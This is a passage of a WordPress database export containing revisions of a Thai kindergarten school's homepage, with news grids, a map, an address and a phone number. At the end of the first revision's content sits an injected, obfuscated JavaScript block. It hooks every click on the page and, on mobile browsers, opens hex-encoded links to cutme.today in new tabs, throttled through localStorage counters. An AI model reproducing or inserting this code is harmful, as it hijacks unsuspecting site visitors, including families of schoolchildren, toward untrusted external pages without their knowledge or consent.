//nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 16:19:25','2025-07-15 09:19:25','',19,'http://watprato.ssk.in.th/?p=713',0,'revision','',0),
(715,1,'2025-07-15 16:24:42','2025-07-15 09:24:42','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist 